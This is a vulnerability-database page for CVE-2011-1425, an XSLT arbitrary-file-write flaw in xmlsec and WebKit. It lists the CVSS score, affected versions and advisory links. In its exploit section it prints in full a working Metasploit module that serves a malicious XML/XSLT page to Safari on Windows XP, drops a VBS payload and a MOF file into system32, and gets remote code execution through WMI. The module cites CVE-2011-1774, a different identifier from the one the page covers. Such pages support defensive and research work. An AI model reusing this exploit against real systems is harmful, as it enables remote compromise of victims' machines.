CVE-2011-1425 : Detail

CVE-2011-1425

A01-Broken Access Control
1.24%V3
Network
2011-04-02
23h00 +00:00
2017-08-16
12h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

xslt.c in XML Security Library (aka xmlsec) before 1.2.17, as used in WebKit and other products, when XSLT is enabled, allows remote attackers to create or overwrite arbitrary files via vectors involving the libxslt output extension and a ds:Transform element during signature verification.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-264 Category : Permissions, Privileges, and Access Controls
Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 17993

Publication date : 2011-10-17 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: safari_xslt_output.rb 13987 2011-10-18 07:39:50Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::WbemExec def initialize(info = {}) super(update_info(info, 'Name' => 'Apple Safari Webkit libxslt Arbitrary File Creation', 'Description' => %q{ This module exploits a file creation vulnerability in the Webkit rendering engine. It is possible to redirect the output of a XSLT transformation to an arbitrary file. The content of the created file must be ASCII or UTF-8. The destination path can be relative or absolute. This module has been tested on Safari and Maxthon. Code execution can be acheived by first uploading the payload to the remote machine in VBS format, and then upload a MOF file, which enables Windows Management Instrumentation service to execute the VBS. }, 'License' => MSF_LICENSE, 'Author' => ['Nicolas Gregoire'], 'Version' => '$Revision: 13987 $', 'References' => [ ['CVE', '2011-1774'], ['OSVDB', '74017'], ['URL', 'http://lists.apple.com/archives/Security-announce/2011/Jul/msg00002.html'], ], 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'Space' => 2048, }, 'Platform' => 'win', 'Targets' => [ #Windows before Vista [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 20 2011')) end def autofilter false end def check_dependencies use_zlib end def on_request_uri(cli, request) # Check target before attacking agent = request.headers['User-Agent'] if agent !~ /Windows NT 5\.1/ or agent !~ /Safari/ or agent !~ /Version\/5\.0\.\d/ print_error("This target isn't supported: #{agent.to_s}") send_not_found(cli) return end url = "http://" url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST'] url += ":" + datastore['SRVPORT'] + get_resource() + "/" content = <<-EOS <?xml-stylesheet type="text/xml" href="#fragment"?> <!-- Define the DTD of the document This is needed, in order to later reference the XSLT stylesheet by a #fragment This trick allows to have both the XML and the XSL in the same file Cf. http://scarybeastsecurity.blogspot.com/2011/01/harmless-svg-xslt-curiousity.html --> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED >]> <doc> <!-- Define location and content of the files --> <mof> <location><![CDATA[\\\\.\\GLOBALROOT\\SystemRoot\\system32\\wbem\\mof\\#{@mof_name}]]></location> <content><![CDATA[#{@mof_content}]]></content> </mof><vbs> <location><![CDATA[\\\\.\\GLOBALROOT\\SystemRoot\\system32\\#{@vbs_name}]]></location> <content><![CDATA[#{@vbs_content}]]></content> </vbs> <!-- The XSLT stylesheet header, including the "sx" extension --> <xsl:stylesheet id="fragment" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:sx="http://icl.com/saxon" extension-element-prefixes="sx" xmlns="http://www.w3.org/1999/xhtml" > <xsl:output method="xml" indent="yes" /> <!-- The XSLT template --> <xsl:template match="/"> <!-- Define some XSLT variables --> <xsl:variable name="moflocation" select="//mof/location/text()"/> <xsl:variable name="vbslocation" select="//vbs/location/text()"/> <!-- Create the files --> <sx:output file="{$vbslocation}" method="text"> <xsl:value-of select="//vbs/content"/> </sx:output> <sx:output file="{$moflocation}" method="text"> <xsl:value-of select="//mof/content"/> </sx:output> <!-- Some output to the browser --> <html> </html> </xsl:template> </xsl:stylesheet> </doc> EOS #Clear the extra tabs content = content.gsub(/^\t\t/, '') print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...") send_response(cli, content, {'Content-Type'=>'application/xml'}) handler(cli) end def exploit # In order to save binary data to the file system the payload is written to a VBS # file and execute it from there via a MOF @mof_name = rand_text_alpha(rand(5)+5) + ".mof" @vbs_name = rand_text_alpha(rand(5)+5) + ".vbs" print_status("Encoding payload into vbs...") payload = generate_payload_exe @vbs_content = Msf::Util::EXE.to_exe_vbs(payload) print_status("Generating mof file...") @mof_content = generate_mof(@mof_name, @vbs_name) super end end

Products Mentioned

Configuraton 0

Aleksey>>Xml_security_library >> Version To (including) 1.2.16

    Aleksey>>Xml_security_library >> Version 0.0.1

      Aleksey>>Xml_security_library >> Version 0.0.2

        Aleksey>>Xml_security_library >> Version 0.0.2a

          Aleksey>>Xml_security_library >> Version 0.0.3

            Aleksey>>Xml_security_library >> Version 0.0.4

              Aleksey>>Xml_security_library >> Version 0.0.5

                Aleksey>>Xml_security_library >> Version 0.0.6

                  Aleksey>>Xml_security_library >> Version 0.0.7

                    Aleksey>>Xml_security_library >> Version 0.0.8

                      Aleksey>>Xml_security_library >> Version 0.0.9

                        Aleksey>>Xml_security_library >> Version 0.0.10

                          Aleksey>>Xml_security_library >> Version 0.0.11

                            Aleksey>>Xml_security_library >> Version 0.0.12

                              Aleksey>>Xml_security_library >> Version 0.0.13

                                Aleksey>>Xml_security_library >> Version 0.0.14

                                  Aleksey>>Xml_security_library >> Version 0.0.15

                                    Aleksey>>Xml_security_library >> Version 0.1.0

                                      Aleksey>>Xml_security_library >> Version 0.1.1

                                        Aleksey>>Xml_security_library >> Version 1.0.0

                                          Aleksey>>Xml_security_library >> Version 1.0.0

                                            Aleksey>>Xml_security_library >> Version 1.0.1

                                              Aleksey>>Xml_security_library >> Version 1.0.2

                                                Aleksey>>Xml_security_library >> Version 1.0.3

                                                  Aleksey>>Xml_security_library >> Version 1.0.4

                                                    Aleksey>>Xml_security_library >> Version 1.1.0

                                                      Aleksey>>Xml_security_library >> Version 1.1.1

                                                        Aleksey>>Xml_security_library >> Version 1.1.2

                                                          Aleksey>>Xml_security_library >> Version 1.2.0

                                                            Aleksey>>Xml_security_library >> Version 1.2.1

                                                              Aleksey>>Xml_security_library >> Version 1.2.2

                                                                Aleksey>>Xml_security_library >> Version 1.2.3

                                                                  Aleksey>>Xml_security_library >> Version 1.2.4

                                                                    Aleksey>>Xml_security_library >> Version 1.2.5

                                                                      Aleksey>>Xml_security_library >> Version 1.2.6

                                                                        Aleksey>>Xml_security_library >> Version 1.2.7

                                                                          Aleksey>>Xml_security_library >> Version 1.2.8

                                                                            Aleksey>>Xml_security_library >> Version 1.2.9

                                                                              Aleksey>>Xml_security_library >> Version 1.2.10

                                                                                Aleksey>>Xml_security_library >> Version 1.2.11

                                                                                  Aleksey>>Xml_security_library >> Version 1.2.13

                                                                                    Aleksey>>Xml_security_library >> Version 1.2.14

                                                                                      Aleksey>>Xml_security_library >> Version 1.2.15

                                                                                        Apple>>Webkit >> Version *

                                                                                        References

                                                                                        http://www.vupen.com/english/advisories/2011/0855
                                                                                        Tags : vdb-entry, x_refsource_VUPEN
                                                                                        http://www.securitytracker.com/id?1025284
                                                                                        Tags : vdb-entry, x_refsource_SECTRACK
                                                                                        http://www.debian.org/security/2011/dsa-2219
                                                                                        Tags : vendor-advisory, x_refsource_DEBIAN
                                                                                        http://www.mandriva.com/security/advisories?name=MDVSA-2011:063
                                                                                        Tags : vendor-advisory, x_refsource_MANDRIVA
                                                                                        http://www.securityfocus.com/bid/47135
                                                                                        Tags : vdb-entry, x_refsource_BID
                                                                                        http://trac.webkit.org/changeset/79159
                                                                                        Tags : x_refsource_CONFIRM
                                                                                        http://www.vupen.com/english/advisories/2011/1010
                                                                                        Tags : vdb-entry, x_refsource_VUPEN
                                                                                        http://www.aleksey.com/pipermail/xmlsec/2011/009120.html
                                                                                        Tags : mailing-list, x_refsource_MLIST
                                                                                        http://secunia.com/advisories/44423
                                                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                        http://www.redhat.com/support/errata/RHSA-2011-0486.html
                                                                                        Tags : vendor-advisory, x_refsource_REDHAT
                                                                                        http://www.vupen.com/english/advisories/2011/1172
                                                                                        Tags : vdb-entry, x_refsource_VUPEN
                                                                                        http://secunia.com/advisories/44167
                                                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                        http://secunia.com/advisories/43920
                                                                                        Tags : third-party-advisory, x_refsource_SECUNIA
                                                                                        http://www.vupen.com/english/advisories/2011/0858
                                                                                        Tags : vdb-entry, x_refsource_VUPEN